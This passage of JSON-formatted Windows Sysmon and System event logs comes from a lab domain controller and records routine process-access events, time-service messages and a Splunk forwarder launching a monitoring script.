06:49:20.021","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2153,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.021\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.021","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2154,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.021\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.021","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2155,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.021\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.021","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2156,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.021\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.021","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2157,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.021\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.021","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2158,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.021\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.021","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2159,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.021\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-0010ED600300}\r\nSourceProcessId: 3816\r\nSourceThreadId: 3836\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1070-5F25-0000-00103BFF0300}\r\nTargetProcessId: 4000\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.021","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010ED600300}","SourceProcessId":"3816","SourceThreadId":"3836","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1070-5F25-0000-00103BFF0300}","TargetProcessId":"4000","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":139,"SourceName":"Microsoft-Windows-Time-Service","ProviderGuid":"{06EDCFEB-0FD0-4E53-ACCA-A6F8BBF81BCB}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76824,"ProcessID":1196,"ThreadID":4060,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"LOCAL SERVICE","UserID":"S-1-5-19","AccountType":"Well Known Group","Message":"The time service has started advertising as a time source.","Opcode":"Info","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":143,"SourceName":"Microsoft-Windows-Time-Service","ProviderGuid":"{06EDCFEB-0FD0-4E53-ACCA-A6F8BBF81BCB}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76825,"ProcessID":1196,"ThreadID":4060,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"LOCAL SERVICE","UserID":"S-1-5-19","AccountType":"Well Known Group","Message":"The time service has started advertising as a good time source.","Opcode":"Info","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2160,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.132\r\nProcessGuid: {E2A3D6B1-1070-5F25-0000-0010F6000400}\r\nProcessId: 3968\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\WinNetMon.cmd\" --scheme\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nParentProcessId: 2792\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.132","ProcessGuid":"{E2A3D6B1-1070-5F25-0000-0010F6000400}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 